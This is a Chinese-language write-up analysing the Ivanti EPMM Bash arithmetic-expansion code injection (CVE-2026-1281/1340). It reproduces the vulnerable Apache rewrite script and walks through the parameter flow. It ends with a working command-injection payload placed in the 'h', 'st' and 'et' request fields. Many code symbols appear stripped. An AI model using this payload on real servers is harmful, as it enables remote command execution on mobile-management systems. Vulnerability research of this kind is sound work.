介绍近日,Ivanti公司披露了Ivanti Endpoint Manager Mobile (EPMM)中存在的代码注入漏洞(CVE-2026-1281和CVE-2026-1340)并确认已存在在野利用。该漏洞源于 Apache HTTPd 调用的 Bash 脚本在处理时间戳比较时未能有效过滤恶意参数导致攻击者可利用 Bash 算术扩展特性注入系统命令。分析首先拿到补丁包RPM的包那就好办了直接查看它执行了什么即可使用命令rpm -qp --scripts ivanti-security-update-1761642-1.0.0L-5.noarch.rpmemmm内容有点多不过根据已知条件该漏洞源于 Apache HTTPd 补丁包里面很容易看到关键的修改Apache HTTPd配置的命令/bin/sed -i \ -e s|RewriteMap mapAppStoreURL prg:/mi/bin/map-appstore-url|RewriteMap mapAppStoreURL prg:/bin/java -cp /mi/bin AppStoreUrlMapper|g \ -e s|RewriteMap mapAftStoreURL prg:/mi/bin/map-aft-store-url|RewriteMap mapAftStoreURL prg:/bin/java -cp /mi/bin AFTUrlMapper|g \ /etc/httpd/conf.d/ssl.conf就是说把map-appstore-url和map-aft-store-url给换掉了不用是吧ok我们去看看这俩脚本是什么目录已经给了在mi/bin下我们直接进终端查一下map-appstore-url和map-aft-store-url是个bash脚本cat就可以直接看内容(另一个脚本内容差不太多就不展示了)。#!/bin/bash set -o nounset declare -x MI_DATE_COMMANDdate %Y-%m-%d--%H-%M-%S declare -x MI_DATE_FORMAT%Y-%m-%d--%H-%M-%S declare -r kScriptName$(basename $0) declare -r kScriptDirectory$(dirname $0) declare -r kLogFile/var/log/${kScriptName}.log declare -r kSaltFile/mi/files/appstore-salt.txt declare -r kScriptStartTimeSeconds$(date %s) declare -r kValidTimeStampLength${#kScriptStartTimeSeconds} declare -r kAftFileStoreDirectory/mi/files/aftstore # error codes that are used in /etc/httpd/conf.d/ssl.conf declare -r kPathTraversalAttemptedErrorCodec91bbeec40aff3fd3fe0c08044c1165a declare -r kLinkHashMismatchErrorCode44b2ff3cf69c5112061aad51e0f7d772 declare -r kTooLateErrorCodec6a0e7ca11208b4f11d04a7ee8151a46 declare -r kTooEarlyErrorCode80862895184bfa4d00b24d4fbb3d942f declare -r kKeyIndexOutOfBoundsErrorCodef74c27fce7d8e2fecd10ab54eda6bd85 declare -r kURLStructureInvalidErrorCodeb702087a848177d489a6891bd7869495 declare -r kTimestampLengthInvalidErrorCode2ecad569fdaa07e2b66ed2595cf7240f declare -r kLinkSpoofErrorCodecbfa488e9b08d4c5d7b3b2084ffb18e7 declare -r kLinkUsingOddTraversalErrorCodef489b91db387b684f56c07e7f5e4308b gShouldLogToFilefalse gSaltFileModificationTime0 gTestModefalse gErrorCode0 gErrorMessage declare -a gSaltArray( ) gCurrentSalt gHostname gPath gStartTime gEndTime if (( $# 0 )) ; then gTestModetrue fi #echo gTestMode${gTestMode} # information function log() { if ${gTestMode} ; then echo $MI_DATE_COMMAND -- ${kScriptName} -- ${1}: ${:2} else # do not log since it kills performance echo $($MI_DATE_COMMAND) -- ${kScriptName} -- ${1}: ${:2} ${kLogFile} fi } function logDebug() { if ${gTestMode} ; then echo $MI_DATE_COMMAND -- ${kScriptName} -- ${1}: ${:2} else # do not log since it kills performance ${gShouldLogToFile} echo $($MI_DATE_COMMAND) -- ${kScriptName} -- ${1}: ${:2} ${kLogFile} fi } # errorCode # information function logDenial() { local theCurrentDate$(MI_DATE_COMMAND) if ${gTestMode} ; then echo $theCurrentDate -- ${kScriptName} -- ${1}: denying: errorCode${2}: ${:3} else #echo $theCurrentDate -- ${kScriptName} -- ${1}: denying: errorCode${2}: ${:3} ${kLogFile} logger -t ${kScriptName} -i -p local0.warning $theCurrentDate -- ${1}: denying: errorCode${2}: ${:3} fi } log MAIN starting function dumpSaltArray() { log ${FUNCNAME} entered for theSalt in ${gSaltArray[]} ; do log ${FUNCNAME} theSalt$theSalt done } log MAIN after dumpSaltArray declaration function readSaltFile() { if [[ -f ${kSaltFile} ]] ; then theCurrentSaltModificationTime$(stat -c %Y ${kSaltFile}) logDebug ${FUNCNAME} theCurrentSaltModificationTime${theCurrentSaltModificationTime} theDeltaTime$(($theCurrentSaltModificationTime - $gSaltFileModificationTime)) logDebug ${FUNCNAME} theDeltaTime${theDeltaTime} if [[ ${theDeltaTime} -ne 0 ]] ; then log ${FUNCNAME} theDeltaTime${theDeltaTime} not zero; loading salt from kSaltFile${kSaltFile} gSaltArray( $(cat ${kSaltFile})) gSaltArray[0] gSaltFileModificationTime$theCurrentSaltModificationTime fi else log ${FUNCNAME} kSaltFile${kSaltFile} not found fi } log MAIN after readSaltFile declaration #readSaltFile #dumpSaltArray #readSaltFile function lookupSaltByIndex() { #echo $1 ${#gSaltArray[*]} if [ $1 -lt ${#gSaltArray[*]} ] ; then gCurrentSalt${gSaltArray[$1]} else gCurrentSalt fi logDebug ${FUNCNAME} theKeyIndex$1; gCurrentSalt$gCurrentSalt } log MAIN after lookupSaltByIndex declaration function verifyURLConsistency () { logDebug ${FUNCNAME} ${1} local ret # this is what we eventually echo and its the name of a file for httpd to send to the client or a pattern that Rewrite is aware of and kill the connection with the right HTTP error code #theAppStoreString${1%%:*} #echo ${theAppStoreString} #declare theOldIFS${IFS} local theArgumentArray # process what httpd gave us in $1 splitting on the _ IFS_ theArgumentArray(${1}) theAftStoreString${theArgumentArray[0]} theAftStoreAssetGUIDWithExtension${theArgumentArray[1]} gHostname${theArgumentArray[2]} theURLString${theArgumentArray[3]} #echo ${theAftStoreString} # process what mifs really gave us in $1 splitting on the , IFS, theAftStoreKeyValueArray(${theAftStoreString}) IFS${theOldIFS} if (( ${#theArgumentArray[]} ! 4 )) ; then ret${kURLStructureInvalidErrorCode} log ${FUNCNAME} ${ret} expecting 5 segments; actual${#theArgumentArray[]} fi if [[ -z ${ret} ]] ; then for theKeyMapEntry in ${theAftStoreKeyValueArray[]} ; do theKey${theKeyMapEntry%%*} theValue${theKeyMapEntry##*} logDebug ${FUNCNAME} theKey$theKey; theValue$theValue case ${theKey} in kid) gKeyIndex${theValue} ;; st) gStartTime${theValue} if (( ${#gStartTime} ! ${kValidTimeStampLength} )) ; then ret${kTimestampLengthInvalidErrorCode} fi ;; et) gEndTime${theValue} if (( ${#gEndTime} ! ${kValidTimeStampLength} )) ; then ret${kTimestampLengthInvalidErrorCode} fi ;; h) gHashPrefixString${theValue} ;; *) ret${kURLStructureInvalidErrorCode} logDenial ${FUNCNAME} ${ret} unknown presented key${theKey}; theValue${theValue} ;; esac done fi if [[ -z ${ret} ]] ; then lookupSaltByIndex ${gKeyIndex} if [[ -n ${gCurrentSalt} ]] ; then logDebug ${FUNCNAME} continuing: gCurrentSalt$gCurrentSalt theCurrentTimeSeconds$(date %s) logDebug ${FUNCNAME} theCurrentTimeSeconds${theCurrentTimeSeconds} #theCurrentTimeSeconds1336011206 #theCurrentTimeSeconds1336770818 #gHostnamecot-0000001.mobileiron.com #gHostnameqa42.mobileiron.com if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]] ; then logDebug ${FUNCNAME} continuing: not too early if [[ ${theCurrentTimeSeconds} -lt ${gEndTime} ]] ; then logDebug ${FUNCNAME} continuing: not too late # calculate the path gPath${theURLString/\/sha256:${theAftStoreString}/} theStringToHash${gCurrentSalt}${gHostname}${gPath}${gStartTime}${gEndTime} theAssetFile${theAftStoreAssetGUIDWithExtension} # the string to hash must end with the assetfile start end logDebug ${FUNCNAME} theStringToHash${theStringToHash} if [[ ${theStringToHash} *${theAssetFile}${gStartTime}${gEndTime} ]] ; then theSHA256Hash$(echo -n ${theStringToHash} | sha256sum) theSHA256Prefix${theSHA256Hash:0:64} # theSHA256Prefix${theSHA256Hash} logDebug ${FUNCNAME} theSHA256Hash$theSHA256Hash; theSHA256Prefix$theSHA256Prefix shopt -s nocasematch if [[ ${theSHA256Prefix} ${gHashPrefixString} ]] ; then logDebug ${FUNCNAME} hash matched if [[ ${theAssetFile} *..* ]] || [[ ${theAssetFile} .* ]] || [[ ${theAssetFile} /* ]]; then ret${kPathTraversalAttemptedErrorCode} logDenial ${FUNCNAME} ${ret} getting spoofed: ${theAssetFile} else ret${kAftFileStoreDirectory}/${theAftStoreAssetGUIDWithExtension} fi else ret${kLinkHashMismatchErrorCode} logDenial ${FUNCNAME} ${ret} link hash mismatch: theSHA256Prefix$theSHA256Prefix; gHashPrefixString${gHashPrefixString}; ${1} fi else ret${kLinkSpoofErrorCode} logDenial ${FUNCNAME} ${ret} link being spoofed: theStringToHash${theStringToHash}; requiredSuffix${theAppStoreSubDirectory}/${theAppStoreAssetGUID}${theAppStoreAssetExtension}${gStartTime}${gEndTime}; ${1} fi shopt -u nocasematch else ret${kTooLateErrorCode} logDenial ${FUNCNAME} ${ret} link too late: theCurrentTimeSeconds${theCurrentTimeSeconds}; ${1} fi else ret${kTooEarlyErrorCode} logDenial ${FUNCNAME} ${ret} link too early: theCurrentTimeSeconds${theCurrentTimeSeconds}; ${1} fi else ret${kKeyIndexOutOfBoundsErrorCode} logDenial ${FUNCNAME} ${ret} key index out of bounds: ${1} fi else ret${kURLStructureInvalidErrorCode} logDenial ${FUNCNAME} ${ret} URL not structurally correct: ${1} fi # tell httpd what file to send (or error message) echo ${ret} } if ${gTestMode} ; then readSaltFile verifyURLConsistency ${1} else logDebug MAIN looping readSaltFile while read theCurrentLine; do readSaltFile logDebug MAIN ${theCurrentLine} verifyURLConsistency ${theCurrentLine} done fi但内容太多了我们还是请AI老师帮我们统一分析一下AI老师帮我们分析并得到了一个传参请求然后我们还得去apache的配置文件看看入口路径是什么在/etc/httpd/conf.d/ssl.conf文件中找找相关的内容,由于配置文件内容太多了这里就不贴了我也懒得找还是让AI老师帮我们找找吧。deepseek老师还是太善解人意了直接给了一个标准请求/mifs/c/appstore/fob/3/1120/sha256:kid1,st1666663066,et1666670266,ha1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2/75dc90fe-6ae7-4377-913b-7248334d39dc.ipa但这些传参到bash中并没有找到明显的直接命令执行的点这时我们需要再理解一下bash脚本首先看bash脚本中的开头gKeyIndex gStartTime gEndTime gHashPrefixString gPath IFS, read -ra theAppStoreKeyValueArray脚本会用IFS,把传入的参数分割成数组theAppStoreKeyValueArray传参后是这样的数组[kid1, st1444444444, et1444444444, ha1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2]然后在下方有这样的一段循环if [[ -z ${ret} ]] ; then for theKeyMapEntry in ${theAftStoreKeyValueArray[]} ; do theKey${theKeyMapEntry%%*} theValue${theKeyMapEntry##*}它把传参的这些参数名和值循环赋值给了theKey和theValue然后又被赋值到全局变量gKeyIndex、gStartTime、gEndTime、gHashPrefixString中继续跟下去看看这些值在哪里用到。key参数赋值到了变量gKeyIndex最终在这里应用kAppStoreSaltFile/mi/files/appstore-salt.txt gSalt if [[ -f ${kAppStoreSaltFile} ]]; then gSalt$(sed -n ${gKeyIndex}p ${kAppStoreSaltFile}) if [[ -z ${gSalt} ]]; then ret${kSaltIndexInvalidErrorCode} logDenial ${FUNCNAME} ${ret} kid(${gKeyIndex}) is invalid (no salt found) fi else ret${kSaltFileMissingErrorCode} logDenial ${FUNCNAME} ${ret} Salt file ${kAppStoreSaltFile} not found fi它是用来读取/mi/files/appstore-salt.txt对应行的这个文件里面的hash值读取出来用来校验后续参数。st 参数最终赋值给了gStartTime分别在两个地方被调用kValidTimeStampLength10 case ${theKey} in st) gStartTime${theValue} if (( ${#gStartTime} ! ${kValidTimeStampLength} )); then ret${kTimestampLengthInvalidErrorCode} fi ;;这里判断了这个参数是否长度为10。theCurrentTimeSeconds$(date %s) if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then logDebug ${FUNCNAME} Current time(${theCurrentTimeSeconds}) start time(${gStartTime}) # ... else ret${kRequestExpiredErrorCode} logDenial ${FUNCNAME} ${ret} Start time(${gStartTime}) is in the future fi这里用来比较当前时间是否晚于请求开始时间。et 参数gEndTime和gStartTime的用处差不多也校验了长度和用于验证当前时间≤结束时间。h 参数gHashPrefixString是用于hash校验的值。看上去还是没有直观的命令执行的代码别急我们再引入一个知识点。首先给大家看一个脚本#!/bin/bash arr vararr[echo hacked ./hack_mht0] [[ 1 -gt $var ]] if [[ -f ./hack_mht ]]; then echo 执行成功 else echo 未执行 fibro们觉得这个脚本能成功执行命令吗答案为什么会这样捏因为在bash中数值比较功能可以解析array[index]这样的数值索引index会被优先解析为算数表达式比如array[11]会先计算11而bash又有一个命令替换的优先级规则如果你把array[11]改为array[echo 111]则先执行被反引号包裹的命令举例current_datedate echo 今天是: $current_date echo 当前目录: pwd显然在if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; 和if [[ ${theCurrentTimeSeconds} -lt ${gEndTime} ]] ; 中都存在这个条件但我们之前说了gStartTime和gEndTime都做了长度校验的必须为十位这就很鸡肋了那怎么样才能绕过这个问题呢回到最开始的定义变量与循环if [[ -z ${ret} ]] ; then for theKeyMapEntry in ${theAftStoreKeyValueArray[]} ; do theKey${theKeyMapEntry%%*} theValue${theKeyMapEntry##*}bash中使用theKey和theValue循环赋值传参的最后一个值为h所以theValue最后的值是就是h的值那现在就很有意思了gStartTime和gEndTime都有长度限制但h的值没有能不能让h的值走到if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then里面去应用数值索引命令替换呢可以的既然在bash中有变量theValueh传参那我们就直接让gStartTimetheValue最终流程可控h参数-theValue-gStartTime然后进入if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]];应用数值索引命令替换现在我们已经有了RCE的完整链条开始构造最终poc。kid参数为文件行数随便用个1st参数为theValue注意十位长度校验所以还需要再加两个空格et参数也参与比较也可作为theValue传参st与et随便一个地方设置为theValue都可以最后是h参数只需要满足array[index]即可。index部分的内容有了array部分写什么呢bash开头开启了set -o nounset这是严格模式严格模式下Bash 遇到未定义的变量会直接终止脚本执行直接从bash开头定义的那些空变量里面选一个比如gPath和gHostname都可以构造最终值gHostname[id /mi/bin/mht]